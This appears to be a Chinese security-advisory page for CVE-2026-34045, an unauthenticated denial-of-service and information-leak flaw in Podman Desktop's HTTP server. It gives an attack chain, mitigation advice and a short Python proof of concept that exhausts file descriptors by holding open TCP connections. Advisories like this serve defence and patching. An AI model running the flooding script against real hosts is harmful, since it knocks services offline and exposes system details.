CVE-2026-34045 CVSS 8.2 高危

CVE-2026-34045 Podman Desktop远程DoS漏洞

披露日期: 2026-04-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34045

漏洞类型

拒绝服务

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Podman Desktop

漏洞概述

Podman Desktop在1.26.2之前的版本中存在一个未经身份验证的HTTP服务器漏洞。该漏洞允许网络攻击者远程触发拒绝服务条件并提取敏感信息。攻击者可以通过滥用缺失的连接限制和超时机制，耗尽文件描述符和内核内存，导致应用崩溃或主机完全冻结。此外，详细的错误响应会泄露内部路径和系统详细信息。

技术细节

该漏洞的核心在于Podman Desktop暴露的HTTP服务器缺乏有效的连接数限制和超时处理机制。攻击者无需任何认证即可通过网络访问该服务。利用方式主要包括两部分：一是资源耗尽，攻击者通过建立大量不关闭的TCP连接或发送恶意请求，迅速消耗系统的文件描述符和内核内存资源，导致服务不可用甚至系统死机；二是信息泄露，服务器在异常处理时返回过于详细的错误堆栈信息，其中包含内部文件路径、系统架构以及在Windows环境下暴露的用户名等敏感数据，这极大地降低了后续攻击的难度。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，发现目标主机上开放的Podman Desktop HTTP服务端口。

STEP 2

2. 资源耗尽

攻击者向目标端口发送大量连接请求或恶意数据包，利用缺乏连接限制的缺陷耗尽文件描述符和内核内存。

STEP 3

3. 信息泄露

在触发错误条件时，分析服务器返回的详细错误响应，提取内部路径、系统版本及用户名等敏感信息。

STEP 4

4. 拒绝服务

由于资源耗尽，Podman Desktop应用程序崩溃，严重情况下导致主机系统完全冻结，无法提供正常服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import time

# Basic PoC to demonstrate resource exhaustion (File Descriptor exhaustion)
# Target: Podman Desktop HTTP Server (Default port may vary, e.g., 6904)
TARGET_HOST = '127.0.0.1'
TARGET_PORT = 6904

def trigger_dos():
    connections = []
    print(f"[+] Attempting to exhaust resources on {TARGET_HOST}:{TARGET_PORT}")
    try:
        while True:
            # Create a socket connection without closing it
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(1)
            try:
                s.connect((TARGET_HOST, TARGET_PORT))
                connections.append(s)
                print(f"[+] Connection #{len(connections)} established.")
                # Keep connection open to exhaust file descriptors
            except socket.error as e:
                print(f"[-] Connection failed: {e}")
                break
            # Small delay to prevent immediate script crash if network is too fast
            time.sleep(0.05)
    except KeyboardInterrupt:
        print("[!] Stopping attack...")
    finally:
        for s in connections:
            s.close()

if __name__ == "__main__":
    trigger_dos()

影响范围

Podman Desktop < 1.26.2

防御指南

临时缓解措施

建议立即将Podman Desktop升级到1.26.2或更高版本以彻底修复此漏洞。在无法立即升级的情况下，应通过网络防火墙严格限制对Podman Desktop HTTP服务端口的访问，禁止外部网络连接，仅保留本地回环访问，以降低被远程攻击的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表